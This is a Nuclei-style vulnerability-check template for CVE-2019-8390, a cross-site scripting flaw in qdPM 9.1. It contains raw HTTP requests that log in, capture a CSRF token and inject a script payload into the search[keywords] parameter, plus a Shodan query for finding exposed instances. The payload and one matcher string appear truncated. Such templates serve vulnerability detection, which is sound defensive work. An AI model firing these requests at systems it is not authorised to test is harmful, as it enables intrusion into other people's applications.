id: CVE-2019-8390 info: name: qdPM 9.1 - Cross-site Scripting author: theamanrawat severity: medium description: | qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. reference: - https://www.exploit-db.com/exploits/46399/ - http://qdpm.net/download-qdpm-free-project-management - https://nvd.nist.gov/vuln/detail/CVE-2019-8390 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-8390 cwe-id: CWE-79 metadata: verified: true shodan-query: http.favicon.hash:762074255 max-request: 3 tags: cve,cve2019,xss,qdpm,authenticated,edb http: - raw: - | GET /index.php/login HTTP/1.1 Host: {{Hostname}} - | POST /index.php/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer= - | POST /index.php/users HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded search[keywords]=e">&search_by_extrafields[]=9 cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '' - 'alert alert-info alert-search-result' condition: and - type: word part: header words: - 'text/html' - type: status status: - 200 extractors: - type: regex name: csrf part: body group: 1 regex: - 'name="login\[_csrf_token\]" value="(.*?)"' internal: true